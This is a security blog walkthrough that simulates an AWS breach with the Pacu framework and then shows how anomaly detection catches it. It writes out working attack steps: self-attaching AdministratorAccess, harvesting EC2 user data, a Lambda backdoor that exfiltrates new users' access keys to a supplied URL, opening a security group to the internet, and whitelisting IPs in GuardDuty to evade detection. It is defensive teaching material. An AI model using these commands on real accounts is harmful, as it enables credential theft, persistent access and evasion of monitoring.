Tracking Adversaries in AWS using Anomaly Detection, Part 2

Going through the cyber “kill chain” with Pacu and using automated analysis to detect anomalous behavior

The first part of this series explored minimizing the impact of a breach by identifying malicious actors’ anomalous behavior and taking action. In part two, we will go through the cyber “kill chain” with Pacu and explain how to use automated analysis to detect anomalous behavior.

While many tasked with protecting their organization’s cloud infrastructure tend to think the battle is lost once the environment is breached, this is not the case. There are tools that, by analyzing abnormal behavior, can detect adversaries at work and modify the access being exploited to stop them in their tracks.

We set out to simulate a scenario in which an adversary compromises a third-party service and exploits its legitimate access to an AWS account. Such a scenario is not hard to imagine today, especially as we are still working to understand the full impact of the Log4j vulnerability on the security posture of the world's software. For the simulation, we ran Pacu, the open source exploitation framework by Rhino Security Labs, against an AWS environment.

To make the simulation as realistic as possible, we will add the following inline IAM policy to the IAM role used by the third party. The policy is provisioned by a CloudFormation template that an actual vendor supplies as part of onboarding to its service:

```json
{
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:ListInstanceProfiles",
        "iam:AddRoleToInstanceProfile",
        "iam:RemoveRoleFromInstanceProfile",
        "iam:ListInstanceProfilesForRole",
        "iam:PassRole",
        "iam:GetInstanceProfile",
        "iam:GetRole",
        "iam:ListAccountAliases",
        "iam:ListAttachedRolePolicies",
        "iam:ListPolicies",
        "iam:AttachRolePolicy"
      ],
      "Resource": "*"
    }
  ]
}
```

If we're being honest, most of us won't bother inspecting the permissions a third party asks for (ironically, especially when they are created as part of a CloudFormation template's extensive provisioning process). We assume that most clients will apply the requested permissions as is. It will shortly become evident why this is harmful.
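To make the risk concrete, here is a minimal Python sketch that flags privilege-escalation-prone actions in a policy document such as the one above. PRIVESC_ACTIONS and find_privesc_grants are our own illustrative names, not part of Pacu or any AWS tool, and the action list is far from exhaustive:

```python
import fnmatch

# Illustrative, non-exhaustive list of IAM actions widely documented as
# privilege escalation paths when granted on broad resources.
PRIVESC_ACTIONS = [
    "iam:AttachRolePolicy",
    "iam:AttachUserPolicy",
    "iam:PutRolePolicy",
    "iam:PutUserPolicy",
    "iam:CreatePolicyVersion",
    "iam:CreateAccessKey",
    "iam:UpdateAssumeRolePolicy",
    "iam:PassRole",
]


def _as_list(value):
    """IAM accepts either a single value or a list for Statement/Action/Resource."""
    if isinstance(value, (str, dict)):
        return [value]
    return list(value or [])


def find_privesc_grants(policy):
    """Return sorted (risky_action, resource) pairs granted by Allow statements.

    Granted actions may use IAM wildcards such as "iam:*" or "iam:Attach*", so
    each risky action is matched against them case-insensitively. Statements
    using NotAction or NotResource are skipped in this sketch.
    """
    findings = set()
    for statement in _as_list(policy.get("Statement")):
        if statement.get("Effect") != "Allow" or "NotAction" in statement:
            continue
        for granted in _as_list(statement.get("Action")):
            for risky in PRIVESC_ACTIONS:
                if fnmatch.fnmatchcase(risky.lower(), granted.lower()):
                    for resource in _as_list(statement.get("Resource")):
                        findings.add((risky, resource))
    return sorted(findings)
```

Run against the vendor policy above, it would report iam:AttachRolePolicy and iam:PassRole, both granted on "Resource": "*".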

Now put on your hacker’s hat and let’s get started.

Because it's the easiest way to begin, we will run Pacu from its provided Docker image using the following command:

```shell
docker run -it --entrypoint /bin/sh rhinosecuritylabs/pacu:latest
```

Because we're loading it fresh from the image, Pacu starts a new session for us. Sessions are an important Pacu feature: they let you run several projects or campaigns side by side, storing the information collected by each in a database that you can easily access.

Next, we display all the available modules using the ls command:

We can see a list of all the modules, categorized by the attack phase they support. This list is really useful for navigating the modules if you're not that experienced with Pacu or with waging such campaigns. (By the way, the list also makes Pacu an awesome tool for getting familiar with pentesting AWS!) Pacu also makes it easy to learn about each module with the help <module_name> command.



Next, using set_keys, we'll set the keys we obtained by assuming the role through which the breached third party accesses the account:
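Those keys come from a standard STS AssumeRole call made with the third party's own credentials. A minimal sketch, assuming the vendor role requires an external ID (a common pattern for third-party access); assume_vendor_role is a hypothetical helper that accepts any boto3 STS client:

```python
def assume_vendor_role(sts_client, role_arn, external_id, session_name="vendor-session"):
    """Exchange the caller's credentials for temporary credentials of role_arn."""
    response = sts_client.assume_role(
        RoleArn=role_arn,
        RoleSessionName=session_name,
        ExternalId=external_id,  # third-party roles commonly require an external ID
    )
    credentials = response["Credentials"]
    # Values to paste into Pacu's set_keys prompts; temporary keys also need the session token.
    return {
        "access_key_id": credentials["AccessKeyId"],
        "secret_access_key": credentials["SecretAccessKey"],
        "session_token": credentials["SessionToken"],
    }
```

For example, call assume_vendor_role(boto3.client("sts"), "arn:aws:iam::123456789012:role/VendorRole", "example-external-id"). The role ARN and external ID are placeholders.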

We can now use the whoami command to see information about the identity we can use:

You may have noticed that we have no information other than the keys we've set, which makes sense, as we've yet to collect any. We'll start by collecting information about our permissions with the run iam__enum_permissions command:

Now that we have information about our permissions, we can start the first phase of our campaign. Our first goal is to escalate privileges so that we can run the later steps of the campaign with as many permissions as possible.

This is what the role's set of policies looks like before the escalation:

We see that the role has only the ReadOnlyAccess policy and the inline policy we saw earlier, which includes the iam:AttachRolePolicy permission.
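The same view is available directly from the IAM API, which is handy for double-checking what Pacu reports. A minimal boto3 sketch; describe_role_policies is a hypothetical helper, and the role name you pass in is a placeholder:

```python
def describe_role_policies(iam_client, role_name):
    """Return the managed and inline policy names attached to an IAM role."""
    managed, inline = [], []
    # Managed policies, AWS-managed (such as ReadOnlyAccess) or customer-managed
    for page in iam_client.get_paginator("list_attached_role_policies").paginate(RoleName=role_name):
        managed.extend(policy["PolicyName"] for policy in page["AttachedPolicies"])
    # Inline policies embedded directly in the role
    for page in iam_client.get_paginator("list_role_policies").paginate(RoleName=role_name):
        inline.extend(page["PolicyNames"])
    return {"managed": sorted(managed), "inline": sorted(inline)}
```

Call describe_role_policies(boto3.client("iam"), "VendorRole") before and after the escalation. Beforehand, the managed list should contain ReadOnlyAccess alone; afterward, it should also include AdministratorAccess.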

To escalate privileges, we will use the iam__privesc_scan module twice. We first run it in --scan-only mode to find out which escalation techniques are available, and then in regular mode to perform the escalation. Running the module looks like this:

For a comprehensive list of the ways privileges can be escalated in AWS, refer to Rhino Security Labs' privilege escalation article. This case is pretty straightforward. The inline policy grants iam:AttachRolePolicy on all resources, so the role can attach new policies to itself, including the AdministratorAccess policy. That is exactly what the privilege escalation process does:
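In CloudTrail, this escalation boils down to a single AttachRolePolicy event in which the role named in the request is the role that made the call. A minimal detection sketch, assuming the CloudTrail records have already been parsed into Python dicts; is_self_escalation and the PRIVILEGED_POLICY_ARNS set are our own illustrative choices:

```python
# Illustrative set of AWS managed policies we treat as "privileged".
PRIVILEGED_POLICY_ARNS = {
    "arn:aws:iam::aws:policy/AdministratorAccess",
    "arn:aws:iam::aws:policy/IAMFullAccess",
}


def is_self_escalation(event):
    """Return True if an assumed role attached a privileged policy to itself."""
    if event.get("eventSource") != "iam.amazonaws.com":
        return False
    # errorCode is present when the call failed, e.g. with AccessDenied
    if event.get("eventName") != "AttachRolePolicy" or event.get("errorCode"):
        return False
    identity = event.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return False
    # For assumed roles, sessionIssuer.userName holds the underlying role's name
    issuer = identity.get("sessionContext", {}).get("sessionIssuer", {})
    params = event.get("requestParameters") or {}
    return (
        params.get("roleName") == issuer.get("userName")
        and params.get("policyArn") in PRIVILEGED_POLICY_ARNS
    )
```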

Great - now we’re admin of the account!

Let’s continue by gathering more information about what’s available in the environment. For example, we can use the ec2__enum module to gather information about resources from the EC2 service (not just EC2 instances but also VPCs, subnets, etc.):

By running the ec2__download_userdata module, we can collect EC2 user data from all instances found:

User data is an EC2 instance attribute used to run a script when the instance launches. Its content can be sensitive because it is sometimes mistakenly used to store secret strings, such as database connection strings (as discussed in a previous blog post). Fortunately for us, Pacu saves each instance's user data in a separate file. It also saves a combined file containing the user data of all the instances it collected. We can use the combined file to easily search for such sensitive information.
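Searching that combined output can be as simple as running a few regular expressions over it. The sketch below assumes you fetch and decode the user data yourself with boto3 rather than reading Pacu's files. fetch_user_data, find_secrets, and SECRET_PATTERNS are hypothetical and intentionally crude:

```python
import base64
import re

# Hypothetical, deliberately simple patterns; real secret scanners use many more.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*\S+"),
    "connection_string": re.compile(r"\b(?:mongodb|postgres(?:ql)?|mysql)://[^\s'\"]+"),
}


def fetch_user_data(ec2_client, instance_id):
    """Return an instance's base64-decoded user data, or '' if none is set.

    Gzip-compressed user data would additionally need gzip.decompress().
    """
    response = ec2_client.describe_instance_attribute(
        InstanceId=instance_id, Attribute="userData"
    )
    encoded = response.get("UserData", {}).get("Value")
    if not encoded:
        return ""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


def find_secrets(text):
    """Return (pattern_name, matched_text) pairs, grouped by pattern."""
    hits = []
    for name, pattern in SECRET_PATTERNS.items():
        hits.extend((name, match.group(0)) for match in pattern.finditer(text))
    return hits
```

For example, call find_secrets(fetch_user_data(boto3.client("ec2"), instance_id)) for each instance ID returned by describe_instances.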

If, for example, we find credentials in an instance's user data for a database hosted outside the AWS account, we can extend our access to even more resources.

We also tried out Pacu's S3 data exfiltration module with the following command, which is meant to enumerate the object keys in all the buckets:

```
run s3__download_bucket --names-only
```

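Some buckets (especially CloudTrail log buckets) hold millions of objects, so in a typical account this can take forever. Instead, we used the following script. It relies on the fact that a single, unpaginated s3.list_objects_v2 call returns at most 1,000 keys per bucket:

```python
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

# Print each bucket name followed by (at most) its first 1,000 object keys:
# a single, unpaginated list_objects_v2 call never returns more than that.
for bucket in s3.list_buckets()["Buckets"]:
    print(bucket["Name"])
    try:
        response = s3.list_objects_v2(Bucket=bucket["Name"])
    except ClientError as error:  # e.g. AccessDenied on a locked-down bucket
        print(f"  skipped: {error.response['Error']['Code']}")
        continue
    for object_metadata in response.get("Contents", []):
        print(object_metadata["Key"])
```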

Next, because we want to persist in the environment, we can look for users with sufficient permissions and create access keys for them for future use. We start by using the iam__enum_users_roles_policies_groups module to collect information about the various IAM resources in the account:

We can now display the IAM information using the data iam command:



Since we’ve found a group called Administrators, we will use the plain AWS CLI to list the users in it (unfortunately, we couldn’t find a Pacu module that supports this action):
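The CLI command for this is aws iam get-group --group-name Administrators. The equivalent boto3 call, wrapped in a hypothetical group_members helper that follows pagination, is sketched below:

```python
def group_members(iam_client, group_name):
    """Return the user names in an IAM group (CLI equivalent: aws iam get-group)."""
    members = []
    # get_group is paginated; each page repeats the group and lists some users
    for page in iam_client.get_paginator("get_group").paginate(GroupName=group_name):
        members.extend(user["UserName"] for user in page["Users"])
    return members
```

For example, group_members(boto3.client("iam"), "Administrators").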

Having found the “FindingsFixer” user, we will now create access keys that we can use later as permanent credentials:
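Switching briefly to the defender's side: a new access key on a member of a privileged group is a cheap signal worth checking. A minimal sketch, assuming you already have the group's member names. recent_access_keys and since_hours_ago are hypothetical helpers:

```python
from datetime import datetime, timedelta, timezone


def since_hours_ago(hours):
    """Timezone-aware cutoff, comparable with boto3's CreateDate values."""
    return datetime.now(timezone.utc) - timedelta(hours=hours)


def recent_access_keys(iam_client, user_names, since):
    """Return (user, key_id, status) for access keys created at or after `since`.

    Each IAM user can hold at most two access keys, so no paging is needed.
    """
    recent = []
    for user_name in user_names:
        for key in iam_client.list_access_keys(UserName=user_name)["AccessKeyMetadata"]:
            if key["CreateDate"] >= since:
                recent.append((user_name, key["AccessKeyId"], key["Status"]))
    return recent
```

For example, recent_access_keys(boto3.client("iam"), ["FindingsFixer"], since_hours_ago(24)) would surface a key created during the last day.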

Pacu allows us to persist in a much cooler way, however, by running the following command:

```
run lambda__backdoor_new_users --exfil-url <DESTINATION_URL>
```

With this single command, we create a Lambda function that is triggered by user creation events. For every new user, it creates an access key and sends the key's ID and secret to a destination of our choice, where we can store them for later use.

Here’s how it looks:

Now an EventBridge rule and a Lambda function have been created in the victim account. The EventBridge rule responds to the creation of new IAM users by triggering the Lambda:

The Lambda, in turn, creates an access key for the newly created user and sends its information to the destination URL that was supplied:

Now if we create a new user, even without an access key:

...the Lambda generates an access key for the new user:

It then sends the access key ID and secret to the URL we supplied earlier. In this case, the destination is a Lambda that parses the information it receives and logs it to CloudWatch:
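From the defender's side, this persistence mechanism leaves a durable artifact: an EventBridge rule keyed to IAM user creation. Below is a minimal sketch that lists such rules on the default event bus. It assumes the rule's pattern names CreateUser explicitly. rules_watching_user_creation is a hypothetical helper, and we don't claim this matches the exact pattern Pacu creates:

```python
import json


def rules_watching_user_creation(events_client):
    """Return names of EventBridge rules whose pattern targets IAM CreateUser calls.

    Simplification: only rules that list CreateUser explicitly under
    detail.eventName are caught; broader patterns (e.g. all IAM API calls)
    would need a real event-pattern matcher.
    """
    flagged = []
    for page in events_client.get_paginator("list_rules").paginate():
        for rule in page["Rules"]:
            # Scheduled rules have a ScheduleExpression instead of an EventPattern
            pattern = json.loads(rule.get("EventPattern") or "{}")
            sources = pattern.get("source", [])
            event_names = pattern.get("detail", {}).get("eventName", [])
            if "aws.iam" in sources and "CreateUser" in event_names:
                flagged.append(rule["Name"])
    return flagged
```

Call it as rules_watching_user_creation(boto3.client("events")). Then inspect each flagged rule's targets with list_targets_by_rule to see which Lambda it invokes.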

When you want to remove this persistence mechanism, simply run the same command with the --cleanup flag:

```
run lambda__backdoor_new_users --cleanup
```

Pacu also makes it easy to backdoor security groups by creating new inbound rules. Suppose that during discovery we found a machine we'd like to access, such as one presumably running MongoDB, but it isn't accessible on port 27017 (MongoDB's default port):

We can easily run Pacu's security group backdoor module against the machine's security group to change that:

The security group now allows us (and anyone else) to access the machine on port 27017:
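On the defender's side, spotting this kind of backdoor means looking for ingress rules that expose a port to the entire internet. Below is a minimal sketch that works on the SecurityGroups list returned by EC2's describe_security_groups. world_open_groups is a hypothetical helper, and it only checks the exact 0.0.0.0/0 and ::/0 ranges:

```python
def world_open_groups(security_groups, port):
    """Return IDs of security groups allowing TCP `port` from 0.0.0.0/0 or ::/0.

    `security_groups` is the "SecurityGroups" list returned by EC2's
    describe_security_groups.
    """
    exposed = []
    for group in security_groups:
        for permission in group.get("IpPermissions", []):
            protocol = permission.get("IpProtocol")
            if protocol == "-1":
                covers_port = True  # "-1" means all protocols and all ports
            elif protocol in ("tcp", "6"):
                covers_port = permission["FromPort"] <= port <= permission["ToPort"]
            else:
                covers_port = False
            open_v4 = any(r.get("CidrIp") == "0.0.0.0/0" for r in permission.get("IpRanges", []))
            open_v6 = any(r.get("CidrIpv6") == "::/0" for r in permission.get("Ipv6Ranges", []))
            if covers_port and (open_v4 or open_v6):
                exposed.append(group["GroupId"])
                break  # one matching rule is enough to flag this group
    return exposed
```

For example, world_open_groups(boto3.client("ec2").describe_security_groups()["SecurityGroups"], 27017) lists the groups that expose MongoDB's default port. Larger accounts would use the describe_security_groups paginator instead.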

Finally, a tactic which attackers often employ is to evade detection mechanisms that victims might use to discover their activity (apparently they’ve heard of the three-battles model, too!). Pacu has modules for that phase as well.

First, you can run the following command to enumerate the detection mechanisms the victim employs:

```
run detection__enum_services
```

One such service is GuardDuty, an AWS service that detects suspicious behavior based on known signatures. GuardDuty lets you configure a list of trusted ("whitelisted") IP addresses for which no alerts are generated. This is, of course, very useful for malicious actors. The configuration is created by publishing a text file that lists the IPs to be whitelisted and then registering it as a trusted IP list in GuardDuty. Pacu's guardduty__whitelist_ip module does this with a simple command:

The module first runs the detection__enum_services command to find GuardDuty detectors in each region; a detector is the resource that represents the GuardDuty service in a region. It then applies the whitelist file to every detector it finds.
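Defenders can audit for this evasion technique by listing the trusted IP lists attached to each GuardDuty detector. A minimal sketch; trusted_ip_lists is a hypothetical helper, and any list you don't recognize deserves scrutiny:

```python
def trusted_ip_lists(guardduty_client):
    """Return (detector_id, name, location, status) for each GuardDuty trusted IP list.

    Sketch only: NextToken pagination is ignored, since a region typically has a
    single detector per account and very few IP sets.
    """
    found = []
    for detector_id in guardduty_client.list_detectors()["DetectorIds"]:
        for ip_set_id in guardduty_client.list_ip_sets(DetectorId=detector_id)["IpSetIds"]:
            ip_set = guardduty_client.get_ip_set(DetectorId=detector_id, IpSetId=ip_set_id)
            found.append((detector_id, ip_set["Name"], ip_set["Location"], ip_set["Status"]))
    return found
```

Because GuardDuty is regional, you would call it once per region. For example, create boto3.client("guardduty", region_name=region) for each region in boto3.session.Session().get_available_regions("guardduty").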

The whitelist has been added, and GuardDuty can now be evaded:

Automating Analysis of Anomaly Detection

Using an automated cloud security platform like Tenable, you can detect behavioral anomalies that correspond to the attack patterns we've described in this post. Tenable Cloud Security provides an innovative identity-first approach to securing infrastructure that leverages both cloud infrastructure entitlement management (CIEM) and cloud security posture management (CSPM). This approach essentially allows you to better wage all three battles by:

- Analyzing configurations to detect posture issues

- Analyzing the permissions in the environment alongside the activity logs to determine what identities can do and, based on their actual activity, what they really need to do

- Generating insights from the activity logs to detect behavior that corresponds with how an attacker might behave and is anomalous compared to normal day-to-day operations
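The second bullet, comparing what identities can do with what they actually do, can be approximated with a simple set difference. A minimal sketch, not Tenable's implementation. unused_actions is a hypothetical helper that takes an identity's granted actions and its CloudTrail records (as dicts):

```python
def unused_actions(granted_actions, cloudtrail_events):
    """Return granted IAM actions that never appear in the identity's CloudTrail events.

    Assumes an action name is "<service prefix>:<eventName>", with the prefix
    taken from the eventSource host (iam.amazonaws.com -> iam). This holds for
    many services but not all, so treat the output as a starting point for review.
    """
    used = {
        f"{event['eventSource'].split('.')[0]}:{event['eventName']}".lower()
        for event in cloudtrail_events
    }
    return sorted(action for action in granted_actions if action.lower() not in used)
```

Permission-only actions such as iam:PassRole never appear as CloudTrail events of their own, so they will always show up as unused. This is one reason the output needs human review.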

The final bullet above refers to Tenable's automated anomaly detection:

Tenable Cloud Security checks that an activity pattern both corresponds with what an attacker would do as part of a campaign and is anomalous compared with what the identity has done before. This avoids the false positives that are a common fault of automation tools. Weeding out identities that normally perform such activities lets you home in on the activities that really require your attention.
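The core rule is to alert only when an action is both attacker-like and new for the identity performing it. It can be illustrated with a deliberately naive Python sketch. This is not how Tenable Cloud Security implements it; the SENSITIVE_EVENTS mapping and all helper names are our own assumptions:

```python
from collections import defaultdict

# Illustrative mapping of CloudTrail event names to the tactic they suggest.
SENSITIVE_EVENTS = {
    "AttachRolePolicy": "privilege escalation",
    "CreateAccessKey": "persistence",
    "AuthorizeSecurityGroupIngress": "network access management",
    "CreateIPSet": "defense evasion",
}


def identity_key(event):
    """Key roles by role ARN rather than by the per-session assumed-role ARN."""
    identity = event["userIdentity"]
    issuer = identity.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("arn") or identity.get("arn")


def build_baseline(history):
    """Map each identity to the set of event names it has performed before."""
    baseline = defaultdict(set)
    for event in history:
        baseline[identity_key(event)].add(event["eventName"])
    return baseline


def suspicious_events(baseline, new_events):
    """Flag events that are both attacker-like and new for the identity."""
    alerts = []
    for event in new_events:
        key, name = identity_key(event), event["eventName"]
        if name in SENSITIVE_EVENTS and name not in baseline.get(key, set()):
            alerts.append((key, name, SENSITIVE_EVENTS[name]))
    return alerts
```

Keying roles by their role ARN rather than the assumed-role session ARN matters here. Session names change between sessions, which would otherwise make every session look new.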



For example, if we see an identity that provides itself with a privileged policy and has never performed such an action before, we may report it as a suspicious privilege escalation event:

If a role that has never managed network configuration before changes the inbound rules of a security group, we report it as unusual network access management:

You can also open up and see the entire CloudTrail event for full details:

Finally, you can also see reconnaissance, such as collection of EC2 user data or the listing of objects in all the S3 buckets in the environment (events are filterable by service type).

Conclusion

The cybersecurity battlefield is complex. While it is a huge challenge, it also offers us as defenders a significant opportunity if we understand it properly. Our adversaries have an advantage: after all, finding an exploitable gap is much easier than covering all bases at all times while keeping the business running as usual in the dynamic world of modern infrastructure. Yet we have the advantage of being able to master the lay of the land and use it to take the high ground in this battle.

Because cloud infrastructure largely centralizes permissions management and log collection, it confronts us with the complexity of managing and controlling both correctly. Yet it also gives us an opportunity to analyze this data and generate actionable insights toward creating an environment in which malicious actors find it harder to maneuver. And when they try, it will be easier for us to detect them.